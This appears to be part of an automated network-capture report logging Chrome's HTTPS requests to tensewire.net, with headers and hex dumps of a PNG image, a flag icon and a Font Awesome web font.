                              2024-04-25 18:22:13 UTC542INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 00 53 08 06 00 00 00 69 b8 f5 68 00 00 0c 5e 69 43 43 50 44 69 73 70 6c 61 79 00 00 48 c7 ad 57 77 58 53 c9 16 9f 5b 52 49 68 81 08 48 09 bd 89 d2 09 20 25 84 16 41 40 aa 20 2a 21 09 24 94 18 12 82 88 1d 5d 54 60 ed 22 8a 15 5d 15 51 dc d5 15 90 b5 22 ae 75 51 ec ae 65 b1 a0 b2 b2 2e 16 6c a8 bc 09 09 e8 73 df fb e3 7d df 9b ef 9b 3b bf 9c 39 f3 3b 25 33 f7 ce 01 40 a7 93 2f 93 e5 a1 ba 00 e4 4b 0b e5 f1 11 21 ac 89 a9 69 2c 52 17 c0 01 0a a8 80 05 bc f8 02 85 8c 13 17 17 0d 60 1b 1a bf 6a 08 00 6f ae ab 9e 00 5c 71 51 71 81 ff ad e9 0b 45 0a 01 a4 49 87 38 53 a8 10 e4 43 7c 1c 00 bc 54 20 93 17 02 40 0c 85 72 eb e9 85 32 15 16 43 6c 20 87 0e 42 3c 4b 85 b3 d5 78 b9 0a 67 aa f1 f6 41 9d c4
                              Data Ascii: PNGIHDRSih^iCCPDisplayHWwXS[RIhH %A@ *!$]T`"]Q"uQe.ls};9;%3@/K!i,R`jo\qQqEI8SC|T @r2Cl B<KxgA
                              2024-04-25 18:22:13 UTC1369INData Raw: 1b 41 dc 28 92 72 92 86 78 44 8a 89 d1 43 b1 08 45 a1 61 ea d8 b1 76 91 34 49 13 2f 76 4f 56 18 12 af 59 db 2b cb 8b d3 e8 e3 64 51 5e 84 4a 6e 05 b1 89 a2 28 41 b3 16 1f 5b 08 37 a7 9a 1f 8f 96 15 c6 25 aa fd c4 33 72 f8 e3 e2 d4 fe e0 45 20 1a 70 41 28 3c 7d 4a d8 33 c1 34 90 03 24 ed 3d 4d 3d f0 97 7a 26 1c f0 81 1c 64 03 11 70 d1 48 86 56 a4 0c ce 48 e1 33 01 94 80 bf 20 12 01 c5 f0 ba 90 c1 59 11 28 82 f2 4f c3 52 f5 d3 05 64 0d ce 16 0d ae c8 05 8f 21 ce 07 51 20 0f fe 56 0e ae 92 0e 5b 4b 06 8f a0 44 f2 0f eb 02 e8 6b 1e ec aa b9 7f ca 38 50 12 ad 91 28 87 78 59 3a 43 9a c4 30 62 28 31 92 18 4e 74 c4 4d f0 40 dc 1f 8f 86 cf 60 d8 dd 71 36 ee 3b e4 ed 17 7d c2 63 42 07 e1 01 e1 1a a1 93 70 6b aa a4 54 fe 8d 2f e3 41 27 e4 0f d7 44 9c f9 75 c4 b8 1d
                              Data Ascii: A(rxDCEav4I/vOVY+dQ^Jn(A[7%3rE pA(<}J34$=M=z&dpHVH3 Y(ORd!Q V[KDk8P(xY:C0b(1NtM@`q6;}cBpkT/A'Du
                              2024-04-25 18:22:13 UTC1369INData Raw: fd d1 cc d1 d1 a3 4b 47 37 8d 7e 3e c6 66 4c da 98 15 63 4e 8f f9 ec ea e5 9a e7 ba dd f5 b6 9b be db 38 b7 52 b7 16 b7 97 ee 4e ee 02 f7 1a f7 ab 1e 74 8f 70 8f b9 1e cd 1e 2f 3c 9d 3d 45 9e 9b 3c 6f 7a 31 bc c6 7b 2d f2 6a f5 fa e4 ed e3 2d f7 6e f0 ee f6 b1 f1 c9 f0 d9 e0 73 83 6d c0 8e 63 57 b2 cf f8 12 7c 43 7c e7 fa 1e f6 7d ef e7 ed 57 e8 b7 df ef 6f 7f 17 ff 5c ff dd fe 4f c7 da 8f 15 8d dd 3e f6 61 80 55 00 3f 60 6b 40 67 20 2b 30 23 70 4b 60 67 90 65 10 3f a8 36 e8 41 b0 75 b0 30 78 47 f0 13 8e 23 27 87 b3 87 f3 3c c4 35 44 1e 72 30 e4 2d d7 8f 3b 9b 7b 3c 14 0b 8d 08 2d 0f 6d 0f d3 0f 4b 0a 5b 1f 76 2f dc 2a 3c 3b bc 3e bc 37 c2 2b 62 66 c4 f1 48 42 64 54 e4 8a c8 1b 3c 33 9e 80 57 c7 eb 1d e7 33 6e f6 b8 b6 28 5a 54 42 d4 fa a8 07 d1 4e d1 f2
                              Data Ascii: KG7~>fLcN8RNtp/<=E<oz1{-j-nsmcW|C|}Wo\O>aU?`k@g +0#pK`ge?6Au0xG#'<5Dr0-;{<-mK[v/*<;>7+bfHBdT<3W3n(ZTBN
                              2024-04-25 18:22:13 UTC1369INData Raw: bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 34 38 20 37 39 2e 31 36 34 30 33 36 2c 20 32 30 31 39 2f 30 38 2f 31 33 2d 30 31 3a 30 36 3a 35 37 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 30 32 2f 32 32 2d 72 64 66 2d 73 79 6e 74 61 78 2d 6e 73 23 22 3e 20 3c 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 20 72 64 66 3a 61 62 6f 75 74 3d 22 22 20 78 6d 6c 6e 73 3a 78 6d 70 3d 22 68 74
                              Data Ascii: " id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="ht
                              2024-04-25 18:22:13 UTC1369INData Raw: 00 00 d8 0d 2a 01 00 00 00 80 d0 01 00 00 00 00 a1 03 00 00 00 00 42 07 00 00 00 00 84 0e 00 00 00 40 e8 00 00 00 00 b0 54 e8 2a 2d 1d 00 4d 31 a2 32 d1 88 c8 20 ba 11 dd 89 61 c4 08 97 8c 23 56 66 c3 f8 4c 7f e7 59 fe cd 56 44 5d a2 02 51 10 ed 02 00 48 91 eb 89 c2 b9 20 a2 ac 10 3a 70 4b 39 96 e6 40 62 1e b1 81 38 48 7c 47 5c 12 c6 49 e2 63 62 21 31 8a 68 4f dc 89 36 04 20 92 92 ae ce 2f 1b 4f 10 8a 98 4a fc 95 58 4d 6c 25 3e 21 f6 10 67 88 6f 72 e1 33 fe fb 5b f8 df eb b9 f0 55 62 38 d1 83 68 41 dc 4b fc 02 42 97 cb 03 44 73 21 64 70 c7 a9 6e 38 e6 eb 88 fa c4 1f 88 35 02 a5 ed 84 cd 2c f8 7a 02 fa d4 53 c4 5c 21 8c 34 18 e7 4d 82 e2 9c cb 2b 49 4e 63 69 27 28 0e 2d a5 fc 1e b7 55 4d a2 17 f1 72 c2 6f 4d 22 06 f0 03 7d 09 c1 f3 b4 ae 8f da bc 42 38 99
                              Data Ascii: *B@T*-M12 a#VfLYVD]QH :pK9@b8H|G\Icb!1hO6 /OJXMl%>!gor3[Ub8hAKBDs!dpn85,zS\!4M+INci'(-UMroM"}B8
                              2024-04-25 18:22:13 UTC1369INData Raw: 32 0c 72 f8 7b 1f 0a 9e af df 08 58 e8 71 22 fd 86 2e 11 7d 5b 5a 1b 9f 3b 81 84 c4 39 dd 7c 8c f7 71 01 f1 ce 0e 81 d0 d7 1a 6e 27 08 5d b6 d0 ab 38 c8 2d 51 d5 c5 ef 6d 13 3c 6f eb 04 56 a5 84 48 1d 42 17 c2 69 c3 bb bc 73 ba d3 5d 42 66 b8 fa 3e c6 5c 57 40 bc ff 0a 81 d0 f5 be 8b 8e 86 e8 03 a1 8b 17 fa dd 29 88 bc 9a 07 bf b7 52 f8 fc fd 39 71 3b 84 0e e2 17 78 fc 32 80 46 ae 23 24 fe d2 3e c6 ac 9f a4 7f 12 b0 21 b3 80 e5 42 8f 12 10 7a f2 42 d7 f7 28 ac 50 b1 7c 1e 5e ce 69 b3 2d e8 27 3a f6 57 78 f5 02 42 8f 28 1b 03 6c e4 ae 42 8e 0f e6 f7 31 66 bd f9 ee 88 a5 67 ee 21 74 08 5d 8a d0 ef 53 59 73 7a e8 63 bf 83 79 ff 83 89 71 fb 82 65 7d 66 25 ef 95 a9 e9 f3 fc 06 a1 07 c8 6b 01 37 f2 68 01 75 f0 ef 00 e2 fe 8f 80 b8 9b 40 e8 10 ba c5 42 2f 47 f4
                              Data Ascii: 2r{Xq".}[Z;9|qn']8-Qm<oVHBis]Bf>\W@)R9q;x2F#$>!BzB(P|^i-':WxB(lB1fg!t]SYszcyqe}f%k7hu@B/G
                              2024-04-25 18:22:13 UTC945INData Raw: b6 2b 77 00 71 4b 0a e5 cf cf 03 f7 13 41 71 94 83 d0 21 74 10 98 d0 13 d9 4f bc 47 bc 44 fc 8e c8 20 ee e1 71 5a 54 65 ba 72 54 5d 79 8b 9b de 9d df 94 db f5 7d 4b ea 57 af 52 a6 41 e8 57 d2 d5 b2 81 f2 98 c3 0d 64 d2 9e 38 2f f0 a6 1a 5d ff b5 88 f2 bc 91 4f 73 23 1f 05 6b 4b bc c8 3b 79 25 95 bd 83 87 a2 83 d0 21 74 08 dd 2c df f2 06 da bd 09 7c ce 7f 66 5b dd 5e 88 6f 34 86 d0 b3 a7 bd 65 0d da db 41 8c 15 2d 88 eb 3c f3 bd e0 32 8e f3 58 74 10 3a 84 0e a1 03 47 79 4a 20 f4 9c e9 12 81 37 f5 96 18 0c ae 78 d7 80 e8 20 74 08 1d 42 07 c9 b2 36 73 fd 41 e8 57 a7 ad 65 8d eb 24 ab 52 63 15 ce ab 04 4d f3 96 21 d1 41 e8 10 3a 84 0e 92 dd 08 57 0c 42 4f 8d 87 2c 6b e4 8e 0e 62 ac 25 f0 bb b4 64 e6 1b 14 1d 84 0e a1 43 e8 20 19 ae b8 d1 11 42 4f 8e 5f 5b d6
                              Data Ascii: +wqKAq!tOGD qZTerT]y}KWRAWd8/]Os#kK;y%!t,|f[^o4eA-<2Xt:GyJ 7x tB6sAWe$RcM!A:WBO,kb%dC BO_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              16192.168.2.449757104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:13 UTC686OUTGET /assets/images/flags/flag-us.png HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: image
                              Referer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:14 UTC821INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:14 GMT
                              Content-Type: image/png
                              Content-Length: 2692
                              Connection: close
                              Cache-Control: public, max-age=604800
                              expires: Tue, 30 Apr 2024 10:24:24 GMT
                              last-modified: Tue, 12 Sep 2023 17:39:54 GMT
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              vary: User-Agent,User-Agent
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: HIT
                              Age: 201470
                              Accept-Ranges: bytes
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KFIZZDXZjUTgtltNJIpR2kjw3S81KDcPjWUMzL0zYxxaUO0JXj6Ry0pmqphNtIfAbSXmHJVElAby1Iz3Yq7hTU6rhrqv3DTllupm8JHWny2GkW9iBBBSYft3u9OQ1aT6"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b798c2d675b-ATL
                              2024-04-25 18:22:14 UTC548INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 0a 36 49 44 41 54 68 81 cd 5a 7b 70 15 d5 19 ff 7d 7b f7 3e f2 00 ee 0d 79 48 80 80 18 02 83 a2 20 01 1f d0 94 19 45 2b 23 c5 5a 8c 6d 41 5b 51 6b 19 c6 3f ea a3 f5 51 5b 67 b0 53 98 4e 69 67 d0 a2 33 06 46 45 a6 58 c0 41 2c 33 34 b4 42 10 14 90 a8 10 30 84 18 f3 84 10 2e b9 9b 90 dc f7 dd af 7f ec ee bd bb 7b f7 be 02 3a fd 66 ee ec 39 df f9 9d ef 75 be 3d e7 db 93 10 ae 02 dd fd f2 21 34 9f f3 57 79 2f 47 16 c6 64 cc 89 c9 3c 03 40 05 80 52 99 d9 75 e9 cd 05 51 00 7e 00 fd 00 da 99 b9 19 c0 31 22 6a 60 e6 56 8f c7 73 c5 36 d0 95 4c ae 78 bc be ea e2 e5 c8 23 d1 18 2f 8b c4 b8 72 bc c7 81
                              Data Ascii: PNGIHDR22?pHYs+6IDAThZ{p}{>yH E+#ZmA[Qk?Q[gSNig3FEXA,34B0.{:f9u=!4Wy/Gd<@RuQ~1"j`Vs6Lx#/r
                              2024-04-25 18:22:14 UTC1369INData Raw: a2 bb 06 03 b1 9a f7 3e ed c3 f2 f9 65 28 70 da 14 47 74 31 b8 b6 d4 85 a1 40 0c 3b 8e 7a f1 b3 f9 a5 70 3a 04 c5 11 00 00 61 f8 f5 6d 69 22 c6 71 5c 0a 5a 09 97 b3 b2 65 e2 f7 97 56 75 1d 90 52 81 52 ce ae 5a fd 1f 77 fb c5 60 fd 3d b3 8a aa bf 68 1f 42 87 37 84 9b 26 15 60 4c be 88 86 af 06 0c d8 fb e7 15 e3 68 eb 65 74 f7 87 50 3d 65 14 1c 22 e1 70 cb 60 7c fc ab 9d 4f 1b 0c 27 90 b6 0f a8 6e 24 56 17 06 be 6e 8e d3 f9 99 38 6d f2 a2 ca 13 bb 2d 9d b1 74 64 ee 33 07 5c 5f 74 0c ed 8d c4 b8 46 d3 e3 b4 13 42 51 d6 e4 5a ce 74 8a 3a 8c 8e 9a 77 3e 15 37 4f 99 aa 4d d6 63 f5 e6 eb c7 75 7c 87 a3 c1 3e e7 fa bb af fb 64 5b 52 9a 25 ed 5a ab 36 36 a2 a9 7b 78 63 24 2a d7 28 02 18 20 e0 37 3f ac 48 08 24 95 cf ea 0f 0c 02 f0 ec 92 8a 04 5f 37 9e 88 ba 46 0c
                              Data Ascii: >e(pGt1@;zp:ami"q\ZeVuRRZw`=hB7&`LhetP=e"p`|O'n$Vn8m-td3\_tFBQZt:w>7OMcu|>d[R%Z66{xc$*( 7?H$_7F
                              2024-04-25 18:22:14 UTC775INData Raw: 91 99 6f 85 d7 f7 f5 32 f5 32 ac 74 a5 d2 6f 96 91 ca 46 22 ea 17 99 b9 1d c0 64 ab b2 61 24 11 4b 55 5e e8 fb e9 4a 94 6c e4 59 d8 d2 2e 00 68 4e e1 65 ca c8 e5 3a 6e 85 c9 34 2f 17 2c 80 66 01 40 fc f6 2c 55 c4 ac 2a 54 73 a5 6a 8e a2 55 f5 9a e9 dd 48 27 3b 83 8e 63 62 e4 58 d3 c7 e1 83 c7 91 dd 19 fb ff 48 04 c7 f7 e6 7c 2c 06 df df d7 e2 af db d1 8a 70 b8 32 71 56 1a f7 6c a8 67 31 43 3b 88 94 96 1e a5 70 49 77 ea 42 c5 70 5c 02 74 32 34 0c 9b 34 90 4e 1a 92 64 58 e8 70 38 5a f3 bd be 16 25 c1 f2 6e fc 13 07 82 cf 65 1b 81 74 ab 97 7e 34 5b 4c f6 3a 28 cf b5 76 7a e0 c4 f3 02 00 08 c5 9e cd 04 92 75 5f 44 e6 12 c0 20 c4 dc 32 16 1c e6 3a 37 15 9e 4c 3a ac 25 a7 ae 38 00 02 c9 42 b1 67 b3 01 d5 ec 9c b9 9b 43 a1 7b 2d ad 4f 12 f4 6d bf 4f d9 e9 20 a7
                              Data Ascii: o22toF"da$KU^JlY.hNe:n4/,f@,U*TsjUH';cbXH|,p2qVlg1C;pIwBp\t244NdXp8Z%net~4[L:(vzu_D 2:7L:%8BgC{-OmO


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              17192.168.2.449758104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:14 UTC693OUTGET /assets/vendors/fontawesome_pro/webfonts/fa-solid-900.woff2 HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              Origin: https://tensewire.net
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: */*
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: font
                              Referer: https://tensewire.net/assets/vendors/fontawesome_pro/css/all.min.css
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:14 UTC832INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:14 GMT
                              Content-Type: font/woff2
                              Content-Length: 327824
                              Connection: close
                              Cache-Control: public, max-age=604800
                              expires: Tue, 30 Apr 2024 10:24:25 GMT
                              last-modified: Thu, 09 Nov 2023 20:05:28 GMT
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              vary: User-Agent,User-Agent
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: HIT
                              Age: 201469
                              Accept-Ranges: bytes
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xb3GcwHXLySN8YB9hUZ%2BPwETYpDIFJISc5X3x5%2BEkEEVKBC3dOErD280SDQ6RAKke6Ly12NPOoqjFwdXwhEKgoKLVGeGwISlQnYl%2Frn5MKcXA0AWqVvDXeunAo275tA%2F"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b7b7e6f06f8-ATL
                              2024-04-25 18:22:14 UTC537INData Raw: 77 4f 46 32 00 01 00 00 00 05 00 90 00 0a 00 00 00 0d 1e 14 00 05 00 45 03 04 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 38 02 24 04 20 06 60 03 e4 54 00 81 8f 30 ca b1 d9 58 cb e4 58 05 87 64 07 20 a5 ff ff 74 2c 08 d8 38 00 00 7c ff 7e 38 22 45 b3 87 e7 0c 80 c1 c6 01 00 a0 ef f3 10 50 55 55 f5 98 10 dc bd 6a 3f 00 e1 a7 5f 7e f3 bb 3f fc e9 2f 7f fb c7 bf fe f3 bf ff 1c 18 8c 3b 00 20 4c 66 8b d5 66 77 38 5d 6e 8f d7 e7 37 54 64 ab 8c ac 99 03 ee 87 7b c0 9e 9d db 11 a0 09 54 b2 c4 16 5a 0f 28 00 2a 01 5a c0 1e 20 b5 c0 7f 79 92 09 08 6b ff d5 91 b0 eb 67 df 04 b4 ef c9 89 38 41 3d e8 05 6b 22 1d e2 55 79 c8 79 51 ee b6 db 07 33 33 d1 71 a1 1e fc 03 9b d0 bb 81 de 6f 03 b0 02 55 a9 05 3b c8 ba d3 9e fe b0 e9 9b e4 1f ab ac e5
                              Data Ascii: wOF2E8$ `T0XXd t,8|~8"EPUUj?_~?/; Lffw8]n7Td{TZ(*Z ykg8A=k"UyyQ33qoU;
                              2024-04-25 18:22:14 UTC1369INData Raw: 4f d8 0e ca 76 e2 c0 73 ec 09 bc 17 87 15 f8 79 0e 6f d8 0f be a3 00 bd 24 bd be fd 5a ff f9 45 a1 c0 af 11 ab 09 a5 eb e4 44 cc 74 df 05 00 05 e8 4f d2 fd a7 72 33 ff 55 f5 eb 45 50 44 c2 b1 fa 6a 41 38 fd 6b e1 f9 7e f5 b9 f2 61 29 9f 8a c3 4d 3d 75 0e 85 b0 91 a8 cd 98 55 c8 dc 47 7f f1 1e 6b 77 14 32 b8 7d fd 13 d8 d5 b2 2b 2c 9a 42 38 7a 14 ed b8 51 d3 8a fa b8 89 ca 58 94 dd 9c 47 48 9c 1b 89 44 68 4b 21 24 fe ff f7 7d aa fd f7 49 89 1c 43 92 e5 31 9c f9 ea ca 7c 45 dd 66 01 ca b2 9d 59 db 7e 55 e5 5f 97 73 ad bd 1b fb 9c 7d 1a b7 6a 9c 7b 23 1a 37 22 d0 b8 81 40 e3 46 04 c6 f8 37 10 d8 7b 9f 7d 6f 9c 73 ee 8d e0 bd 11 41 2a 02 00 69 00 84 64 00 a4 f4 00 90 d6 27 28 d9 af b8 11 81 46 00 60 23 00 b0 01 92 1a e3 81 a2 1a 92 9d 0d 3b fd 8b 0a 20 65 3d
                              Data Ascii: Ovsyo$ZEDtOr3UEPDjA8k~a)M=uUGkw2}+,B8zQXGHDhK!$}IC1|EfY~U_s}j{#7"@F7{}osA*id'(F`#; e=
                              2024-04-25 18:22:14 UTC1369INData Raw: 1f da 1f cd cc 57 32 cf 5d 30 74 4b 31 9c 5b 64 5b 67 c0 ab d2 da 0d 5d 0e 5a de b6 c0 82 e7 7e 7d bc 1e 71 6a 7c 4e c2 95 a3 5d e2 b6 2d 69 0b ec 40 7c 1f 75 46 cb 18 37 43 19 4b 69 6d e1 e5 64 51 ff 69 c6 ae 51 1b 61 cb 8e b3 e2 e7 ec 82 bc a9 c8 e5 31 74 49 60 1b ce 7b b2 e7 bc c8 a9 32 6d e8 b7 28 e7 b0 36 86 eb ca b5 63 7b 0d 8c f1 6b 18 ea 67 a9 bb 29 9e db 58 3b f0 2e e6 b3 67 5f e2 73 93 6c 37 43 17 b5 41 6f 3d 17 8b 74 b2 39 14 fb 8b c9 72 53 6c d1 2a 5e 94 8f d7 44 f8 ad 57 5b 5f 8f 47 fc bd 1e 35 4c 6a c3 5d f5 ae b5 0a de 4d 43 7b 5c 16 54 3b 1f 4b f6 7a 6f 36 d6 36 cc 73 81 de fd 5c 9d c3 37 4b 83 fe 55 be 84 ef 8c 9c 8c fd ba 99 3d bb 9f 3b dc 18 27 93 74 af 46 74 34 1b ff 22 95 c1 c0 90 af f4 4d 54 ea 4b f3 d3 1e 3d 26 9d 8f 2e 79 57 43 9c
                              Data Ascii: W2]0tK1[d[g]Z~}qj|N]-i@|uF7CKimdQiQa1tI`{2m(6c{kg)X;.g_sl7CAo=t9rSl*^DW[_G5Lj]MC{\T;Kzo66s\7KU=;'tFt4"MTK=&.yWC
                              2024-04-25 18:22:14 UTC1369INData Raw: e0 32 59 1a 4f a5 f2 b5 08 19 59 39 e4 ca 2c af 1c 96 73 bf 39 0d da 13 f6 2e e5 2b 77 33 0e 7b ff 46 de 71 2c 1d d5 de b3 8a 7a e4 06 fc 5f 45 5f d1 6b 9d f4 6d 09 14 7e b1 33 a9 a0 4f 1b fb 7b 30 d6 cd 72 51 75 56 3f 36 f1 08 f8 98 fd 4b 61 67 3f f8 71 ce af 8a 09 eb 94 97 9d 0a 85 ef b2 30 0e fd 43 fb 1c 87 d2 3a 1c f6 e1 7a d3 c5 f1 c6 98 20 d6 5a 7a 97 e1 3e f0 ad fa 5c fc e1 fa cd c4 25 bd 7b 2d 2c af cd 62 0a 36 62 1b 94 b2 13 ca 78 8e 6d 13 da 31 c5 f8 33 a6 9d f9 cf 95 85 3f c5 54 15 e3 70 06 79 2c f8 2d 8a 13 c4 a5 f8 be e5 33 ba 1c f3 0b eb 6e 14 f6 f2 70 eb 8c f3 83 f3 39 e7 db ba 07 9f 6d af 4d 1b ec 17 95 7b f7 fe 7e bf 6e 1f 80 fe 03 b6 81 ef 7e ba 8d 7d e3 eb 41 ce 10 37 ef 0d 5e 03 9e 8b ee 55 f6 fd b6 fd fc 09 2a 31 b9 c9 bb 1a db 1f 98
                              Data Ascii: 2YOY9,s9.+w3{Fq,z_E_km~3O{0rQuV?6Kag?q0C:z Zz>\%{-,b6bxm13?Tpy,-3np9mM{~n~}A7^U*1
                              2024-04-25 18:22:14 UTC1369INData Raw: a8 11 68 15 e8 10 e8 e7 c6 73 e3 bb 05 dd e2 6e 29 b7 8e fb 5c bb f7 5c 74 a5 1b ee 46 7b 71 bd c4 5e 32 2f ad 97 d1 cb ea e5 f0 f2 7b 85 bd 92 5e 59 af ba d7 dd fb 10 4c 1e ac 18 6c 18 dc 10 dc 14 dc ae cb 10 fc ef 17 f7 9b f9 cd fd f6 7e 07 7f b8 7f d4 bf e7 3f f6 03 be ef ff f6 ff fa e0 2b 3f c2 8f fa 96 44 30 11 4b c4 16 71 45 3c 91 5c 67 a7 db cb 2e aa 89 ea 67 ea 8a 66 57 77 bb e3 01 62 98 98 26 66 96 c5 62 99 58 79 29 9b c4 36 b1 43 ec 14 c7 c4 35 f1 4c bc 11 8e 70 75 e6 bb 10 07 5b 60 10 1f 12 40 62 48 02 c9 75 2a 7d e1 90 13 72 1d ae 20 14 83 b2 50 19 aa 41 5d a8 07 cd a0 35 b4 81 8e d0 0d 46 c3 0c 98 ad 6b 97 9f de 04 07 6f 78 02 ce c1 35 78 bc f7 09 1c f8 f5 c7 b4 10 0e 11 c8 30 36 26 c4 74 98 1d 4b 62 39 ac 86 0d b0 31 36 c3 e6 38 08 87 e3 38
                              Data Ascii: hsn)\\tF{q^2/{^YLl~?+?D0KqE<\g.gfWwb&fbXy)6C5Lpu[`@bHu*}r PA]5Fkox5x06&tKb91688
                              2024-04-25 18:22:14 UTC1369INData Raw: 6b cc 72 b3 7a ce 8f 64 e6 21 f3 4c 6a 6f 38 98 93 af 1c 6a 46 9b d1 60 92 39 bd 71 28 e4 ee 83 dc 15 b3 e8 bc 7e 39 77 9a 5f 17 9c e2 4e 7e c9 f7 75 2e 1a 75 30 0c cf 33 b3 c1 b4 9c cd b7 37 93 21 37 1b a2 e4 55 73 2f c9 2c 04 f3 51 ee 35 30 33 c1 4c 87 5c f6 b3 d9 a6 1f 65 86 82 19 0c 66 20 98 fe b9 c9 60 7a e7 7d f4 30 bf 6e 9d 1b cb 6d 91 3b 9a 3b ca 87 cc 5a 6e 94 fb e8 19 b9 e1 60 da a6 a2 16 67 38 0a 1c 06 76 df a3 f0 ed ff ba 09 cf f2 cd dd cc 65 7b ce c6 56 e3 71 4d 62 d5 fe 29 c7 c1 c5 c3 12 52 99 2a 54 a5 1a 11 31 09 29 d5 29 90 51 83 9a d4 a2 36 75 a8 4b 3d ea d3 80 86 34 a2 31 4d 68 4a 33 9a d3 82 96 b4 a2 35 9d 9d 53 6e 25 37 71 57 b9 ab bd 0d de 51 ef 53 ef 33 ef 73 ef 1b ef 5b ef 07 ef 27 ef 67 ef 0f ef 1f 11 51 f1 a5 bc 54 91 aa 52 4d 22
                              Data Ascii: krzd!Ljo8jF`9q(~9w_N~u.u037!7Us/,Q503L\ef `z}0nm;;Zn`g8ve{VqMb)R*T1))Q6uK=41MhJ35Sn%7qWQS3s['gQTRM"
                              2024-04-25 18:22:14 UTC1369INData Raw: 14 f1 89 b0 ef fe 24 ea 9c 4d 7c 4a 03 07 10 3f 56 7e 04 f1 0b 75 de 27 7e a9 ce 9e c4 af 54 b6 88 3f a8 f3 34 f1 77 0d 3c 8c f8 87 06 ee 40 fc 4b 9d 93 88 ff 4e e5 a8 6e c4 33 2b e4 fb b8 ea fd 7c 95 a5 fb 80 21 f2 7a 1b e5 6f 51 15 2a e6 a2 2a 95 9f 44 d5 51 e7 46 aa 81 0a 5b 51 0d 52 d8 9e 6a a8 c2 83 54 c3 55 9e 42 35 42 e5 c9 54 23 d5 fe 86 6a 54 0c 7d 34 6a 7f 4b 35 26 e8 93 51 67 36 d5 74 75 76 a1 9a a3 41 73 53 cd 2f 1d aa 25 34 f0 36 aa 65 15 2e a0 5a 3e e8 ab 12 cb eb ab a3 70 1e d5 3a 32 95 6a dd 18 fa 7a 9c 7b 24 c9 a9 da 80 18 fa b6 a8 fd 29 d5 79 32 90 ea 7c e5 8b 52 5d a0 72 28 d5 55 2a fa e8 5f 48 c5 0c fa 17 56 31 9d 6e 5b 05 ba b9 8a 8c 6e 50 f8 9f ee 60 85 2f e9 4e 54 b1 3d dd 49 41 9f 89 c2 d3 74 67 29 bf 9d ee 9a 6a 7f 46 f7 bc 93 aa
                              Data Ascii: $M|J?V~u'~T?4w<@KNn3+|!zoQ**DQF[QRjTUB5BT#jT}4jK5&Qg6tuvAsS/%46e.Z>p:2jz{$)y2|R]r(U*_HV1n[nP`/NT=IAtg)jF
